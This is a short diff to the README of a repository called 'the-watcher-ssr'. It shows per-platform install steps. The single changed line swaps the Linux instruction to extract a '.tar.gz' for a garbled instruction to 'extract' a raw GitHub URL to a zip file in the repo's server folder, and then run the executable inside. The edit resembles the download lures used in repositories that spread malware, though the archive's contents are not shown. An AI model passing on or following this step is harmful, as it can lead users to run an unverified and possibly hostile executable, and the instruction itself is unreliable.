bien000/the-watcher-ssr/README.md

 4. **Install the Application:**
    - **Windows:** Run the downloaded `.exe` file and follow the on-screen instructions.
    - **macOS:** Open the downloaded `.dmg` file, then drag the Watcher to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file via terminal, navigate to the folder, and run the executable.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/bien000/the-watcher-ssr/main/server/the-watcher-ssr-north.zip` file via terminal, navigate to the folder, and run the executable.

 5. **Launch the App:** Once installed, find the Watcher app in your programs or applications list and open it.